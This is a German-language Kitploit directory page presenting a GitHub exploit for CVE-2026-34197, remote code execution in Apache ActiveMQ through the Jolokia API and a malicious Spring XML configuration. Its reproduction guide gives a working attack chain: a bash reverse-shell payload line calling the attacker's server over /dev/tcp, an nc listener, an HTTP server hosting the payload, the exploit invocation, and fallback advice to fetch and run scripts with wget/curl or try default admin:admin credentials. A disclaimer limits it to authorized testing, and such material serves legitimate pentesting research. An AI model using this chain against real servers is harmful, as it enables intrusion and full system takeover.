Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-34197-payload-Apache-ActiveMQ- — Exploit-Skript für CVE-2026-34197, das die Jolokia-API von Apache ActiveMQ angreift, um über eine bösartige Spring-XML-Konfiguration Remote-Code-Ausführung zu erreichen, mit Reverse-Shell-Fähigkeit. | Kitploit
Tools/GitHubGitHub/xshysjhq/cve-2026-34197-payload-apache-activemq-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubxshysjhq/cve-2026-34197-payload-apache-activemq-

CVE-2026-34197-payload-Apache-ActiveMQ-

Exploit-Skript für CVE-2026-34197, das die Jolokia-API von Apache ActiveMQ angreift, um über eine bösartige Spring-XML-Konfiguration Remote-Code-Ausführung zu erreichen, mit Reverse-Shell-Fähigkeit.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ActiveMQ Jolokia RCE-Schwachstellen-Reproduktionsanleitung

Dieses Repository bietet eine Umgebung zur Reproduktion und ein Exploit-Skript für eine Remote Code Execution (RCE)-Schwachstelle, die auf der exponierten Jolokia-API-Schnittstelle (/api/jolokia/) von Apache ActiveMQ basiert. Durch den Aufruf der addNetworkConnector-Operation wird ActiveMQ gezwungen, eine bösartig konstruierte Remote-Spring-XML-Konfigurationsdatei zu parsen, wodurch über MethodInvokingFactoryBean Systembefehle ausgeführt werden.

📁 Enthaltene Dateien

  • payload.py: Haupt-Exploit-Skript, das HTTP-POST-Anfragen mit dynamischem Broker-Namen sendet.
  • payload.xml: Bösartige Spring-Bean-Konfigurationsdatei, die eine Reverse-Shell-Befehlsnutzlast enthält.

🛠️ Umgebungsvorbereitung

  1. Python 3-Umgebung
  2. Abhängigkeiten installieren:
    root@kitploit:~
    pip install requests
    
  3. Angreifer-Maschine (z. B. Cloud-Server): Benötigt eine öffentliche IP, muss HTTP-Dienst-Port und Reverse-Shell-Listening-Port freigeben können.
  4. Zielmaschine: Verwundbarer ActiveMQ-Dienst (z. B. apache/activemq-classic:6.1.0 Docker-Image).

🚀 Reproduktionsschritte

1. Angriffsnutzlast konfigurieren (payload.xml)

Öffnen Sie payload.xml auf der Angreifer-Maschine und finden Sie den folgenden Abschnitt:

root@kitploit:~
<value>bash -c 'bash -i >& /dev/tcp/Ihre-Cloud-Server-IP/15000 0>&1'</value>

Ersetzen Sie die IP durch die öffentliche IP Ihres Cloud-Servers. Wenn in der Zielumgebung kein bash vorhanden ist, ändern Sie es je nach Zielumgebung in sh oder eine andere Ausführungsmethode.

2. Reverse-Shell-Listener starten

Öffnen Sie auf der Angreifer-Maschine (Cloud-Server) ein Terminal und lauschen Sie auf dem angegebenen Port (z. B. 15000):

root@kitploit:~
nc -lvvp 15000

Hinweis: Stellen Sie sicher, dass die Sicherheitsgruppe/Firewall des Cloud-Servers eingehenden TCP-Port 15000 freigegeben hat.

3. HTTP-Dienst zum Hosten der Nutzlast starten

Starten Sie auf der Angreifer-Maschine (im selben Verzeichnis wie payload.xml) einen HTTP-Server, damit das Ziel die XML-Datei herunterladen kann:

root@kitploit:~
python3 -m http.server 9000

Hinweis: Stellen Sie ebenfalls sicher, dass die Sicherheitsgruppe/Firewall des Cloud-Servers eingehenden TCP-Port 9000 freigegeben hat.

4. Exploit-Skript ausführen

Führen Sie payload.py auf dem lokalen Rechner (oder der Angreifer-Maschine) aus. Das Skript unterstützt die Übergabe der Ziel-ActiveMQ-IP:Port (-t) und der IP:Port der Angreifer-Maschine, die die XML-Datei hostet (-a), über Befehlszeilenargumente.

root@kitploit:~
python payload.py -t 192.168.0.1:8161 -a 8.8.8.8:9000

Nach der Ausführung generiert das Skript automatisch einen zufälligen brokerName (z. B. rce_a1b2c3), um das Namenskonfliktproblem java.io.IOException : Network Connector could not be registered in JMX vollständig zu lösen.

5. Shell erhalten

Wenn der Exploit erfolgreich ist:

  1. Ihr HTTP-Server (python3 -m http.server 9000) zeigt eine GET 200-Anfrage für /payload.xml an.
  2. Ihr nc-Listener empfängt eine Reverse-Shell-Verbindung von der Zielmaschine.

⚠️ Häufige Probleme und Fehlerbehebung

  1. XML erfolgreich abgerufen (HTTP 200), aber keine Shell empfangen:
    • Ursache A: Die Sicherheitsgruppe des Cloud-Servers blockiert die Reverse-Shell (eingehender Datenverkehr auf Port 15000 nicht freigegeben).
    • Ursache B: Im Zielcontainer ist kein /bin/bash-Befehl vorhanden (häufig bei schlanken Basis-Images wie Alpine). Ändern Sie den Ausführungsbefehl in payload.xml in /bin/sh oder laden Sie ein Skript über wget/curl herunter und führen Sie es aus.
  2. Ziel meldet Fehler 401 Unauthorized:
  • Ursache: Bei neueren Versionen von ActiveMQ / Jolokia ist eine Kontokennwort-Authentifizierung erforderlich.
  • Lösung: Wenn Standard-Anmeldedaten verwendet werden, können Sie Basic Auth (z. B. admin:admin) zur Anfrage hinzufügen.

🛡️ Haftungsausschluss

Dieses Skript und die Anleitung dienen ausschließlich autorisierten Sicherheitstests und Bildungszwecken. Die Verwendung für unbefugte illegale Tests ist strengstens untersagt. Der Benutzer ist für sein eigenes Handeln verantwortlich.

Tool herunterladen